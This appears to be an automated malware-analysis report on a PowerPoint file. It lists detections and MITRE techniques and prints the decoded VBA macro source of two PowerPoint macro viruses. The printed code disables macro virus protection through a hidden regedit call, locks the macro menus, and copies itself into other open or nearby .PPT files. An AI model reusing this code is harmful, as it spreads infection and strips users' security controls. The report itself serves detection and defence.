MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a PowerPoint file containing VBA macros that attempt to disable macro security by writing to the registry key HKCU\Software\Microsoft\Office\8.0\PowerPoint\Options. It also exports its own VBA code to 'C:\CONFIG.LAC' and creates a registry file 'c:\power.reg'. The embedded URL 'http://www.nod32.com.au/' is present but has an unknown reputation. The primary intent appears to be self-propagation and evasion of security controls.
Heuristics 4
-
ClamAV: Win.Trojan.PPT97-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.PPT97-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.nod32.com.au/ In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4272 bytes |
SHA-256: 8b936a64ab19fde3e62f3d7d306bf588f56b8f37534a9df8378cb818d7c3abb9 |
|||
|
Detection
ClamAV:
Win.Trojan.PP97M-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With
With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub
Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With
With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub
Attribute VB_Name = "Module1"
Const OurAmy = "Amy"
Public SlideAmy As Object
'----------------------------------------------------------------
'PPT.Amy.a
'By -KD- [Metaphase VX Team & NoMercyVirusTeam]
'Greets to Raven, KidCypher, Error-, Foxz, Evul, Roadkil, Tally
'JFK, Slagehammer, AngelsKitten, BSL4, Antistate and #virus
'----------------------------------------------------------------
Sub A\(Amy): On Error Resume Next
If Dir(Application.Path & ".VXD") = "" Then _
ActivePresentation.VBProject.VBComponents(OurAmy).Export Application.Path & ".VXD"
For Each SlideAmy In Presentations
CatchAmy
Next
With Application.FileSearch
.LookIn = ActivePresentation.Path
.FileName = "*.PPT"
.SearchSubFolders = True
.Execute
For MyAmy = 1 To .FoundFiles.Count
If .FoundFiles(MyAmy) = ActivePresentation.FullName Then GoTo CatchThis
Set SlideAmy = Presentations.Open(.FoundFiles(MyAmy))
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
Call CatchAmy
SlideAmy.Save
End If
SlideAmy.Close
CatchThis Next
End With
End Sub
Private Sub CatchAmy()
On Error Resume Next
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
SlideAmy.VBProject.VBComponents.Import Application.Path & ".VXD"
For Each AmyAction In SlideAmy.Slides(SlideAmy.Slides.Count).Shapes
If AmyAction.ActionSettings(ppMouseOver).Action = 0 Then
AmyAction.ActionSettings(ppMouseOver).Action = ppActionRunMacro
AmyAction.ActionSettings(ppMouseOver).Run = "A\"
If Day(Date) = "1" Or Day(Date) = "25" Then
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Here I am again. again overwhelming feelings. thousand miles away. part of
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.